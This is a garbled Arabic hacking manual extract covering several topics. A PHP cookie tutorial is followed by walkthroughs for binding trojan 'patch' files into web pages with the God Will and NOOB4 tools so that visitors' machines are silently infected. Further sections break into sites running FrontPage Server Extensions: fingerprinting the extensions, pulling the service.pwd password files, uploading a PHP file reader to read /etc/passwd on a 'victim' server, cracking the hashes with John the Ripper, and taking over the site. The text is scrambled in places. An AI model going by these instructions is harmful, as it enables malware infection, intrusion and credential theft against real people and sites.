php‬‬ ‫وإليك الكود الخاص بكل ملف ‪:‬‬ ‫‪ -1‬الملف ‪: user.php‬إحدى صفحات الموقع و التي تستفيد من خدمات الملف ‪.‬‬ ‫عندما يطلب المستخدم من متصفحِه صفحة على موقعك فان المتصفح يقوم بارسال جميع الكعكات التي قمت‬ ‫انت بزراعتها عند المستخدم ‪ PHP . user.php‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪-----------------------*/‬‬ ‫‪151‬‬ .‬‬‫‪ <-‬الثانية ‪ :‬عرض نموذج اختيار الللون و حفظ اللون المختار‬‫‪ -2‬الملف ‪ index.‫>‪<body‬‬ ‫>? ‪<? .‬‬ ‫ ماذا لدينا ؟‬‫‪ -1‬الملف ‪ : user.‬‬ ‫مثال ‪:‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪..."echo " palhackerz.‬تسهل عليك قراءة هذه الكعكات و تخزنها في مصفوفة اسمها‬ ‫‪ $_COOKIE‬و هي مصفوفة من النوع ‪ Associative Arrays‬بحيث ان المفتاح هو اسم الكعكة و‬ ‫القيمة قيمة الكعكة كما ارسلتها ‪.com : the best Hacking forum‬‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫قراءة الكعكات من جهاز العميل‬ ‫ كيف تستقبل المتغيرات من الكعكة ‪:‬‬‫كما قلنا بانه بامكانك ارسال اكثر من كعكة الى متصفح واحد ‪..php‬يقوم الملف بعمليتين ‪:‬‬ ‫‪ <-‬الولى ‪ :‬تحديد اللون الذي اختاره الزائر ‪..com‬‬ ‫تطبيق ‪ :‬تخصيص لون الخلفية‬ ‫كمثال بسيط دعنا نقوم بانشاء موقع مبسط و نستخدم الكعكات لكي نحفظ لون الخلفية المحببة الى الشخص ‪.['echo $_COOKIE['site‬‬ ‫?<‬ ‫و هذه تطبع ‪:‬‬ ‫‪:code‬‬ ‫‪palhackerz.

()echo get_color ?> <"‫="احفظ اللون‬INPUT type="submit" value> <FORM/> <-..Color Clearing Form --!> <"form name=color_clear method="GET> <"INPUT type="hidden" name="do" value="clear_color> <"‫="ل تتذكر لوني المفضل‬INPUT type="submit" value> <FORM/> ?> { 152 .Color setting Form --!> <"form name=color_select method="GET> <"INPUT type="hidden" name="do" value="set_color> "=INPUT name="color" type="text" value> <"<? .com /*------------------------- }()function display_form <? <html> <body> <-..com For : h4palestine.Cookies-Based Background Selector <Created By : "Rasha"<rasha@h4palestine.

}()function set_color .time()+36000 .(setcookie('color'.global $_COOKIE }((['if(isset($_COOKIE['color .('header('Location:index.php { }()function get_color .$_GET['color'].global $_GET .['return $_COOKIE['color }else{ .php { selection // }('if ($do=='display_form ."return "#FFFFFF { { }()function clear_color .$_GET['color'].('header('Location:index.time()-36000 .(setcookie('color'.()display_form 153 .

php‬‬ ‫ملف عادي جدًا ال انه يطلب الدالة ‪ get_color‬من ملف ‪ user.('BODY bgcolor="<? include('user..‬‬ ‫ الدالة الرابعة ‪ clear_color‬تقوم بمسح الكعكة بالطريقة التي ذكرناها في الدرس ‪..‬‬ ‫>‪<br‬‬ ‫يمكنك تخصيص لون الخلفية من هنا‬ ‫>‪<br‬‬ ‫>‪ <"a href="user.‬‬‫ الدالة الثانية ‪ set_color‬تقوم بحفظ اللون المختار في كعكة و ترجع المستخدم الى الصفحة الرئيسية ‪..‬‬‫‪ -2‬ملف الـ ‪: index.()set_color‬‬ ‫{‪}("elseif ($do=="clear_color‬‬ ‫‪.php‬‬ ‫‪<"<? ()echo get_color‬‬ ‫>‪<h1‬مرحبا بك ‪<h1/>.()clear_color‬‬ ‫{‬ ‫?<‬ ‫ الدالة الولى ‪ display_form‬تقوم فقط بعرض نموذج اختيار اللون ‪.‫{‪}("elseif ($do=="set_color‬‬ ‫‪..‬‬‫ الدالة الثالثة ‪ get_color‬ترجع قيمة اللون من الكعكة و اذا لم يكن هنالك قيمة فانها ترجع لون افتراضي‬‫وهو البيض ‪.php‬كما يلي ‪:‬‬ ‫‪:code‬‬ ‫>‪<html‬‬ ‫>‪.php?do=display_form‬صفحة تخصيص اللون>‪<a/‬‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫انتهى‪،،،‬‬ ‫‪154‬‬ .

‬‬ ‫** ملف الباتش الذي تريد وضعه في الصفحة‪ ).‫" شرح برنامج السطورة ‪God Will‬في تلغيم الصفحات "‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪ :‬ةة ةةةة<‬ ‫كل ما يلزمنا هو ‪:‬‬ ‫** ملف الــ ‪ html‬الذي تريد تلغيمه‪.‬يجب أن يكون أقل من ‪ 34‬بايت (‬ ‫** برنامج السطورة ‪ Godwill‬لتلغيم الصفحة‪.‬‬ ‫و تجد هذا البرنامج في اللينك التالي‪:‬‬ ‫‪155‬‬ .

.‫‪http://www..‬‬ ‫اضغط على زر ‪ html‬لتجد نفسك في النافذة التالية‪..com/love2002_il/godwill16.‬‬ ‫‪156‬‬ ..zip‬‬ ‫و السيريال نامبر‪tlsecurity :‬‬ ‫لنبدأ‪:‬‬ ‫بعد تجهيز ملف الــ ‪ html‬المراد تلغيمه‪ ،‬و ملف الباتش‪ ،‬شغل برنامج ‪ Godwill‬بعد تحميل‪ ،‬و ستجد‬ ‫أمامك النافذة التالية‪.geocities.

‬‬ ‫‪157‬‬ .‫اضغط على الخيار ‪ General Options‬لتنتقل للنافذة التالية‪.....‬‬ ‫اتبع التعليمات الموجودة في هذه النافذة‪ ،‬و من ثم اضغط الزر ‪Done‬‬ ‫بعدها ستنتقل إلى النافذة التالية‪.

..‬‬ ‫انتهى‪،،،‬‬ ‫‪158‬‬ ..enter Output 3‬و هذا‬ ‫الملف يمثل الصفحة الملغومة‪.co.lycos.‬‬ ‫و هون بقى ‪ ،‬أنت بتعرف شغلك‪.....tripod..‬‬ ‫قم بتحميل الصفحة على إحدى المواقع المستضيفة للصفحات مثل‬ ‫‪ /http://www.‬و‬ ‫ستصلك رساله منه برقم أي بي جهاز الضحية و رقم البورت الذي تم فتحه‪.‫اضغط زر ‪Gen‬‬ ‫سيظهر لك في مجلد البرنامج ملف له نفس السم الذي وضعته في الحقل رقم ‪ .‬سيقوم الباتش بتحميل نفسه بنفسه بدون أن يحس الضحية بأي شيء‬ ‫) طبعا إل إذا كان لديه ‪ ( zone Alarm‬و عند إعادته لتشغيل الكمبيوتر‪ ،‬سيقوم الباتش بتشغيل نفسه‪ ....uk‬و احتفظ بعنوان صفحتك الملغومة جيدا‪..‬‬ ‫عند فتح الضحية لصفحتك الملغومة‪ .

®MoHfOx®.. godwill‬‬ ‫هذا البرنامج من اجل دمج بالباتش وتهيئة علي اساس انه صفحه علي النت‬ ‫اسم البرنامج هو ‪noob 4.‬‬ ‫ول يجعلك ترتبط لحجم معين مثل برنامج ‪.0‬‬ ‫من ااجل عيون الجوكر والجميع =======================================‬ ‫=============================‬ ‫‪ -1‬البرنامج‬ ‫الصوره توضح ما هوالشرح عند ضغطك علي البرنامج وفتحه سوف تاتي هذه الشاشه‬ ‫=================‬ ‫======================‬ ‫=============================‬ ‫‪ layout 2‬للبرنامج‪<<<<====:::‬‬ ‫هو خاص بتكوينات الصفحه وينقسم الي ‪ 6‬اجزاء‬ ‫‪ -2‬خاصه بتكوين الصفحه لمستخدمي ‪Internet Explorer 5‬‬ ‫‪ -3‬خاص بتكوين الصفحه لمستخدمي ‪Internet Explorer5.§¤ :‬‬ ‫وهو ل يرتقى إلى مستوى ‪ god will‬لكنه خفيف جدا ‪.5‬‬ ‫‪4‬و ‪ 5‬هما الي تحديد نوع الملفات المستخدمه في الدمج‬ ‫‪ -6‬هي ما سوف يقوم البرنامج بدمجه مع الصفحه من ملفات‬ ‫‪159‬‬ .‫" وداعا ً للبرنامج السطورة ومرحبا ببرنامج ‪"NOOP4‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< ¤§.

‫==================================================‬ ‫===================‬ ‫‪ executable file 3‬لختيار الباتش ‪<<<<====:::‬‬ ‫‪ -7‬لتحديد مكان الباتش من علي الجهاز‬ ‫‪ -8‬للبداء في تكوين الباتش‬ ‫=======================================‬ ‫=============================‬ ‫‪ -9‬هو اخر المطاف هو انهاء العدادت لتكوين الباتش مع الصفحه‪<<<<====:::‬‬ ‫‪160‬‬ .

‬‬ ‫انتهى‪،،،‬‬ ‫‪161‬‬ .‫وفي نهايه عمل البرنامج يعطي لك المكان الذي تريد ان يحفظ في الصفحه المدموجه‪...‬‬ ‫وصلة البرنامج‪.

L.‬ما الذي ستسفيده عند قراءة الموضوع ؟‬ ‫‪ .‬‬ ‫* كيفية التعامل مع برنامج ‪.‬كيفية معرفة هل الموقع يدعم الـ ‪ FrontPage‬أم ل‬ ‫‪ .‬كيفية التصال بـ ‪FrontPage Extension Server‬‬ ‫‪ . Microsoft Office FrontPage‬‬ ‫* كيفية التعامل مع الـ ‪. SQL‬‬ ‫و بالنسبة لمدارء المواقع ‪ Webmasters‬فإن البرنامج المفضل لهم لتصميم مواقعهم هو ‪Microsoft‬‬ ‫‪ Office FrontPage‬و الذي كما هو مبين يأتي‬ ‫‪162‬‬ . Telnet‬‬ ‫* كيفية التعامل مع بروتوكول ‪. SQL‬‬ ‫* كيفية التعامل مع أحد لغات الويب و التي تعمل بناحية الخادم ‪Server Side Scripting‬‬ ‫‪.‫" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪<. HTTP‬‬ ‫* كيفية التعامل مع قواعد البيانات العلئقية ‪.‬‬ ‫* كيفية جمع المعلومات الخاصة بأي موقع ‪. Language‬‬ ‫و اذكر أخيرًا بأني اؤمن بأن المخترق ما هو إل انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات و‬ ‫ليس انسان همه هو معرفة القليل‬ ‫من المور التي تساعده في التخريب و العبث بما تعب به الخرون و تضييع الوقت في الدردشة و التسكع‬ ‫بمقاهي النترنت ‪ ،‬و لذا فافترض بأن‬ ‫ما أقوله سيكون واضحًا و ل يحتاج لـ ‪.‬‬ ‫@ مقدمة ‪:‬‬ ‫تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعملئها ‪ ،‬فتجدهم يقدمون العروض و التخفيضات‬ ‫لرضاء العملء مثل دعم لـ ‪ PHP‬و‬ ‫‪ CGI‬و ‪ Perl‬و ‪ SSL‬و ‪ FTP‬و ‪.‬‬ ‫* بعض الطرق للستفادة منه عند التصال بالخادم الخاص به ‪.‬كيفية استغلله ليصبح في صلحك‬ ‫@ ما الذي ستستفيده عند قراءتك للموضوع ؟‬ ‫* ستعرف ما هو الـ ‪. ( T.‬ما هو الـ ‪ FrontPage Server Extensions‬؟‬ ‫‪ . CHMOD‬‬ ‫* كيفية التعامل مع الـ ‪.‬مقدمة‬ ‫‪ . Screen Capture‬‬ ‫@ خريطة الموضوع ‪:‬‬ ‫‪ . FrontPage Server Extensions‬‬ ‫* آلية عمله ‪.O.‬‬ ‫* قراءة المزيد عن الـ ‪ FrontPage Server Extensions‬و ليس كيفية اختراقه ‪.‬ما هي آلية عمل الـ ‪ FrontPage Extension Server‬؟‬ ‫‪ . ( DeXXa :‬‬ ‫ما الذي يجب أن تعرفه قبل قراءة هذا الدرس ‪:‬‬ ‫* اللمام بالنجليزية ‪.

‬‬ ‫الثاني ل يهمنا بقدر ما يهم المجلد الول اذ أنه الخاص بالمشرف ول تستطيع الستفادة منه اذا لم تحصل على‬ ‫كلمة المرور الخاصة به ‪..‬يقوم‬ ‫بمنع الجميع ) المالك و المجموعة و‬ ‫‪163‬‬ .btr‬و فيه يتواجد مسارات الملفات التي تم تحميلها على‬‫الخادم ‪ ،‬فاذا قمت بتنزيله فتستطيع معرفة الملفات‬ ‫الموجودة بالموقع ‪.‬‬ ‫@ ما هو الـ ‪ FrontPage Server Extensions‬؟‬ ‫) ملحظة ‪ :‬سأتكلم حاليًا عن الحزم التي أتت بعد حزمة الصدار الثاني (‬ ‫هو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم ‪ Server‬الخاص بشركة التسكين التي لها قالبية‬ ‫لدعم بعض الخصائص ‪.exe/.‬‬ ‫و عند التثبيت يجب انشاء عدة مجلدات منها ‪:‬‬ ‫‪private_/‬‬ ‫‪vti_bin_/‬‬ ‫‪vti_cnf_/‬‬ ‫‪vti_log_/‬‬ ‫‪vti_pvt_/‬‬ ‫‪vti_txt_/‬‬ ‫و سأتكلم عن وظيفة كل مجلد يهمنا ‪:‬‬ ‫* المجلد _‪: vti_bin‬‬ ‫و يتواجد بداخله مجلدان هما ‪:‬‬ ‫) ملحظة ‪ :‬النقطتان تشيران إلى المجلد _‪( vti_bin‬‬ ‫‪/vti_adm_/.‬‬ ‫ الملف ‪ : service...‬‬ ‫كما يوجد ملفان هما ‪:‬‬ ‫‪shtml.‬‬ ‫‪/vti_aut_/.grp‬و فيه يتواجد المعرفين من مشرفين و ‪.‬‬ ‫و في الغالب ل تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف ‪ htaccess. authors‬‬‫ ملفي ‪ deptodoc.btr‬و ‪ : doctodep.‬‬ ‫‪fpcount..‫مع حزمة ‪ ، Office‬اذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ‪ ،‬و لذا تقدم‬ ‫شركات التسكين دعم كامل للبرنامج ‪.pwd‬و فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس ‪DES‬‬‫‪.‬‬ ‫* المجلد _‪: vti_pvt‬‬ ‫و يتواجد بداخله عدة ملفات ما يهمنا منها هو الملفات التالية ‪:‬‬ ‫ الملف ‪ : service.exe/.

‬‬ ‫) ملحظة ‪ :‬ان عدم وضع أي صلحية على المجلدل يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية (‬ ‫* المجلد _‪: private‬‬ ‫و يتواجد بداخله ملف واحد فقط هو ‪. Open Web‬‬ ‫* قم باضافة المعرف و كلمة المرور ) الصلية و ليست المشفرة ( ‪.‬‬ ‫* اذا لم تتم العملية بنجاح فهذا يعني بأن الموقع ل يدعم الخدمة أو أن المعرف أو كلمة المرور خاطئة و‬ ‫يطلب منك معاينتها في وضعية القراءة و ل‬ ‫يظهر لك الشفرة المصدرية الصلية ول المجلدات و الملفات التي يحويها الموقع ‪.‬‬ ‫و الن قم بتنفيذ التالي لمعرفة كيفية التصال بالـ ‪: FrontPage Extension Server‬‬ ‫) ملحظة ‪ :‬سأتكلم حاليًا عن حزمة الـ ‪ XP‬و التي ل تختلف أبدًا عن الحزم الباقية إل في بعض النقاط‬ ‫الشكلية (‬ ‫* قم بتشغيل برنامج الـ ‪ FrontPage‬و الذي يأتي مرفقًا مع حزمة ‪. Office‬‬ ‫* من قائمة ‪ File‬قم باختيار ‪. htaccess.‬‬‫‪ -‬قم بمعانية ملف _‪ vti_inf.html‬و لكن هذا ل يعني أن الموقع ل يدعم الخدمة ‪ ،‬كما أنه ل‬ ‫يعتبر ثغرة (‬ ‫ قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ل ‪.exe‬و من ثم يكرر تمريره مرة أخرى إلى الـ‬ ‫‪ Extension Server‬و إلى الخادم و يظهر المخرجات‬ ‫لـ العميل ‪ ،‬علمًا ان هذه التصالت تتم عبر جدار نار ‪. HTTP‬‬ ‫فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ ‪ FrontPage‬فانه يتم ارسال طلب ‪ Request‬للخادم‬ ‫ثم يمرره الخادم بالـ ‪FrontPage Extension Server‬‬ ‫و الذي يمرره بالتالي ببرمجيات الخادم مثل ‪ ، fpcount.‬‬ ‫* اذا كانت صحيحة سيظهر لك الخادم ملفات الموقع كلها و عندها تستطيع التحميل و التعديل في الملفات و‬ ‫المجلدات و معاينة الشفرة المصدرية‬ ‫للملفات ‪.html‬بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ‪ ،‬مثال ‪:‬‬ ‫‪164‬‬ .‬‬ ‫@ كيفية التصال بـ ‪: FrontPage Extension Server‬‬ ‫كما ذكرنا سابقًا ان أغلب شركات التسكين تسعى لراحة العملء ‪ ،‬فتجدها تدعم خدمة الـ ‪ FrontPage‬و‬ ‫ذلك لتحميل الصفحات للموقع علمًا بأنها‬ ‫تدعم بروتوكول الـ ‪ FTP‬و تحميل الملفات و انشاء المجلدات عبر المتصفح اعتمادًا على البرمجيات التي‬ ‫تعمل بناحية الخادم ‪.‫الزوار ( من معاينة المجلد و محتوياته ‪.‬‬ ‫@ كيفية معرفة هل الموقع يدعم الـ ‪ FrontPage‬أم ل ‪:‬‬ ‫يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها ‪:‬‬ ‫* معاينة ملف نجاح التثبيت ‪:‬‬ ‫) ملحظة ‪ :‬قد ل تجد ملف _‪ vti_inf.‬‬ ‫@ ما هي آلية عمل الـ ‪ FrontPage Extension Server‬؟‬ ‫يعتمد التصال بين العميل و الـ ‪ FrontPage Extension Server‬على بروتوكول الـ ‪.

com/_vti_inf.‫‪http://www.com/_vti_cnf‬‬ ‫ قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختيار ‪.‬‬‫* عن طريق مجلد _‪: vti_cnf‬‬ ‫ قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ل ‪.html‬‬ ‫ و عند معاينة الصفحة ستجد جملة ‪ ، FrontPage Configuration Information‬فهذا معناه أن‬‫حزمة الـ ‪ FrontPage Extension Server‬قد تم تثبيتها‬ ‫في الخادم بنجاح ‪.Victim.‬‬‫ ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة في الموقع الذي تريد معرفة‬‫قابلية دعمه للبرنامج ‪ ،‬و من تلك الخدمات‬ ‫خدمة الـ ‪ FrontPage‬و ستظهر لك بالشكل ‪ mod_frontpage/X‬حيث ‪ X‬يرمز لصدارة الـ‬ ‫‪. Source Code‬‬‫ قم بالبحث عن الشفرة التالية ‪:‬‬‫‪vti_generator:Programe‬‬ ‫ حيث ‪ Programe‬يشير لنوع البرنامج و اصدارته و سيكون في حالتنا هو ‪Microsoft‬‬‫‪ FrontPage X‬و الصدارة الخاصة به هي ‪. Source Code‬‬‫ قم بالبحث بين ترميزي الرأس >‪ <Head></Head‬عن الشفرة التالية ‪:‬‬‫>‪<"Meta Name="GENERATOR" Content="Programe‬‬ ‫ حيث ‪ Programe‬يرمز لنوع البرنامج و اذا كان البرنامج هو ‪ Microsoft FrontPage X. //:http‬‬‫ انتظر بضع ثواني ‪. NetCraft. X‬‬ ‫* الكشف عن الشفرة المصدرية للصفحة ‪:‬‬ ‫ قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ل ‪.‬‬ ‫و لمعرفة اصدارة الخدمة قم بالتالي ‪:‬‬ ‫ قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختيار ‪. X‬‬ ‫* عن طريق موقع ‪: NetCraft‬‬ ‫ قم بزيارة الموقع ‪.net‬‬‫ قم بكتابة عنوان الموقع مستثنيًا الـ ‪.0‬يتبين‬‫لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و‬ ‫الصدارة الخاصة به هي ‪.‬‬‫ قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ‪ ،‬مثال ‪:‬‬‫‪http://www. Source Code‬‬‫ قم بالبحث عن ‪ "FPVersion="Version‬حيث ‪ Version‬تشير للصدار الخاص بالخدمة ‪. FrontPage Extensions Server‬‬ ‫* عن طريق الـ ‪: Telnet‬‬ ‫‪165‬‬ .‬‬‫ قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختيار ‪.Victim.

FrontPage Extensions Server‬‬ ‫@ كيفية استغلله ليصبح في صالحك ‪:‬‬ ‫اذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صلحيات على مجلد الـ _‪ vti_pvt‬قم بالتالي ‪:‬‬ ‫) ملحظة ‪ :‬عليك اللمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ ‪ ، PHP‬كما أن على الموقع‬ ‫الضحية دعم هذه اللغة (‬ ‫* قم بالتصال بالموقع الضحية ‪.("open = FOpen($file. FileSize($file$‬‬ ‫‪.com 80‬‬ ‫ قم بارسال طلب ‪ Request‬للخادم و لتكن الطريقة ‪ Method‬هي ‪. "r$‬‬ ‫‪.net‬‬ ‫‪*/* :Accept‬‬ ‫‪Connection: close‬‬ ‫ انتظر بضع ثواني ‪.Echo $get‬‬ ‫‪.net‬هو البروكسي‬‫الخاص بمزود الخدمة الخاص بك ‪:‬‬ ‫‪Head www.‬‬ ‫و من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و هو أن خدمة الـ ‪ FrontPage‬و‬ ‫ستظهر لك بالشكل ‪mod_frontpage/X‬‬ ‫حيث ‪ X‬يرمز لصدارة الـ ‪.‬‬ ‫* قم بتحميل ملف ينتهي امتداده بـ ‪ PHP‬و ضمنه التالي ‪:‬‬ ‫>?‪PHP‬‬ ‫‪.‬‬‫ ستستلم الجابة ‪ Response‬عن الطلب الذي ارسلتهب للخادم ‪ Server‬مثل تاريخ آخر تعديل للصفحة‬‫و نوع الملقم و الخدمات المتوفرة به ‪. Head‬‬‫) ملحظة ‪ :‬عليك اللمام بكيفية التعامل مع بروتوكول ‪( HTTP‬‬ ‫ قم بارسال التالي حيث ‪ http://www.Victim.1‬‬ ‫‪Host: ISP.net HTTP/1.((get = FGets($open.net‬هو الموقع الضحية و ‪ ISP. Telnet‬‬‫ قم بالتصال بالموقع عبر المنفذ ‪ 80‬بالشكل التالي ‪:‬‬‫‪Microsoft Telnet> Open www.FClose $open‬‬ ‫?<‬ ‫‪166‬‬ .Victim.‫) ملحظة ‪ :‬تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجات‬ ‫الطريقة السابقة (‬ ‫ من قائمة ‪ Start‬قم باختيار ‪ Run‬و اكتب بالنافذة التي ستظهر ‪.Victim.

..Victim../etc/passwd‬‬ ‫حيث ‪ uploded_file‬يشير لسم الملف الذي قمت بتحميله ‪ ،‬و تستطيع اضافة اوامر تسمح لك بمعاينة‬ ‫الملفات و المجلدات الموجودة في الخادم ‪.com/uploded_file../.‫و قمنا هنا برفع ملف ‪ PHP‬للخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايت‬ ‫ثم يعرضه ثم يغلق الملف ‪ ،‬و الن كل‬ ‫ما عليك فعله الن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغير‬ ‫‪ file‬و الملف الذي تريد معاينة الشفرة‬ ‫المصدرية الخاصة به ‪ ،‬مثال ‪:‬‬ ‫‪http://www..‬‬ ‫انتهى‪،،،‬‬ ‫‪167‬‬ .

almodammer.com:‬‬ ‫نضيف الجملة ليصبح بهذه الطريقة‬ ‫‪http://www.com‬‬ ‫وكتابة اسم الموقع وبعد البحث سوف يظهر‬ ‫‪mod_frontpage/x‬‬ ‫‪)=x‬رقم الصدار الخاص بالفرونت بيج(‬ ‫ عن طريق إضافة جملة‬‫‪/_vti_inf.com‬‬ ‫يدعم ‪ fontpage‬طيب نذهب إلى ملف ‪_vti_pvt‬‬ ‫كذا يعني‬ ‫‪http://www.com/_vti_inf.com/_vti_pvt‬‬ ‫وأول ماندخله نلحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم‪:‬‬ ‫‪168‬‬ .html‬‬ ‫بعد عنوان الموقع لنفرض أن الموقع‪/http://www.almodammer.com/_vti_cnf‬‬ ‫واضغط زر الفأرة اليمن واختار‬ ‫‪ source‬المصدر‬ ‫وابحث عن‬ ‫‪vti_generator:Programe‬‬ ‫حيث‬ ‫‪ Programe‬تعني لنوع برنامج الفرونت بيج والصدارات الخاصة به‬ ‫‪-------------------------------------------------‬‬‫‪ -2‬ألحين وعرفنا الموقع يدعم ‪ frontpage‬كيف نقدر نوصل لملف الباسوورد؟‬ ‫بسيطة إنت هات الموقع الي يبدعم ‪ frontpage‬واعلمك‬ ‫يعني وعلى سبيل المثال‬ ‫‪/http://www.html‬‬ ‫وبعدها اضغط ‪Enter‬‬ ‫وراح يطلعلك في أول الصفحة هذه الكلمة‬ ‫‪Frontpage Configuration Information‬‬ ‫أي قد تم تثبيت مجلدات وبرامج الفرونت بيج‬ ‫ وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم ل‬‫بإضافة‬ ‫‪/_vti_cnf‬‬ ‫بعد عنوان الموقع كهذا المثال‪:‬‬ ‫‪http://www.almodammer.netcraft.almodammer.almodammer.‫" اختراق المواقع التي تدعم الفرونت بيج "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫اكثر منا يعلم ان هذه الثغرة خاصة بنظام‪//‬‬ ‫‪NT .Unix‬‬ ‫‪ -1‬وسف أقوم الن بشرح طريقة لمعرفة هل هذه المواقع تدعم ‪ frontpage‬أم ل؟‬ ‫بعدة طرق ولن أذكر إل السهل‪:‬‬ ‫ بالذهاب إلى موقع ‪netcraft‬‬‫‪/http://www.

pwd‬‬ ‫‪Service..pwd‬‬ ‫‪Author.‬‬ ‫حتى توصل‬ ‫>\‪c:‬‬ ‫بعدين اكتب‬ ‫‪cd john‬‬ ‫اضغط على ‪Enter‬‬ ‫‪169‬‬ .pwd‬‬ ‫‪User.openwall.pwd‬‬ ‫‪Adminstrators.pwd‬‬ ‫‪Users.pwd‬‬ ‫=============‬ ‫ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلحظ نلحظ وجود‬ ‫‪username:passwd‬‬ ‫اسم المستخدم والباسوورد‬ ‫يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف ‪ service‬يحتوي على‬ ‫‪user / password‬‬ ‫وهذا مضمون الملف‬ ‫‪operator:hi9LHn9wAMuKM‬‬ ‫حيث اسم المستخدم‪operator:‬‬ ‫الباسوورد المشفرة هي‪hi9LHn9wAMuKM:‬‬ ‫ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إل نفك تشفيره‬ ‫وهذا يتم ببرامج كثير‬ ‫=)‪=(Crack Jack‬‬ ‫=)‪=(John The Ripper‬‬ ‫راح نستخدم الفضل والكثر تداول وهو‬ ‫‪John The Ripper‬‬ ‫لتحميل البرنامج من هذا الموقع‪::‬‬ ‫‪http://www.com/john‬‬ ‫كيف تفك التشفير بهذا البرنامج‬ ‫أول شي تروح تنقل البرنامج إلى مجلد‬ ‫\‪c:‬‬ ‫بعدين تفتح مجلد ‪RUN‬‬ ‫وتسويلك مستند نصي ‪ txt‬وتسمي الملف ‪ passwd‬وتضع فيه كلمة السر الي تبي تفك تشفيرها‬ ‫إذهب إلى‬ ‫ابدأ ‪start‬‬ ‫تشغيل ‪run‬‬ ‫اكتب المر‬ ‫‪command‬‬ ‫اضغط على ‪ Enter‬وبعدها راح يفتح‬ ‫إطار الـ ‪DoS‬‬ ‫اذهب إلى مجلد ‪RUN‬‬ ‫وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم المر‬ ‫‪cd.‫=============‬ ‫‪Adminstrator.

txt‬‬ ‫‪---------------------------------‬‬‫يبحث عن الرقام‬ ‫====‬ ‫‪john -single passwd.pot‬‬ ‫الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها‬ ‫‪-------------------------------------------------------------------------------‬‬‫إنت ألحين مستريح عندك ‪ username‬والـ ‪password‬‬ ‫وش بقالك ؟!!‬ ‫يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من‪/‬‬ ‫)‪(1‬‬ ‫‪frontpage‬‬ ‫بعدين‬ ‫‪ file‬وتذهب إلى‬ ‫‪ open web‬وتضيف‬ ‫السم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك‬ ‫)‪(2‬‬ ‫من ‪FTP‬‬ ‫وعليك ببرامج الـ ‪ FTP‬المنتشرة‬ ‫كالـ ‪ws-ftp‬‬ ‫والـ ‪pro ftp‬‬ ‫‪170‬‬ .txt‬‬ ‫‪--------------------------------‬‬‫أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم‬ ‫‪-------------------------------------------------------------------------------‬‬‫وبعد ماتجرب كل هذي الوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ول ل إذهب إلى‬ ‫‪john.txt‬‬ ‫‪---------------------------------‬‬‫يبحث عن الحرف الصغيرة‬ ‫====‬ ‫‪john -i:Digits passwd.txt‬‬ ‫‪-------------------------‬‬‫يبحث لك عن جميع النواع والحتمالت‬ ‫====‬ ‫‪john -i:Alpha passwd.‫وراح يظهر لك بهذا الشكل‬ ‫>‪c:\john‬‬ ‫واكتب‬ ‫‪cd RUN‬‬ ‫وبتدخل المجلد ليصبح بهذه الطريقة‬ ‫>‪c:/john/RUN‬‬ ‫ألحين نكتب أوامر برنامج ‪John The Ripper‬‬ ‫وهي‬ ‫====‬ ‫‪john -i:all passd.

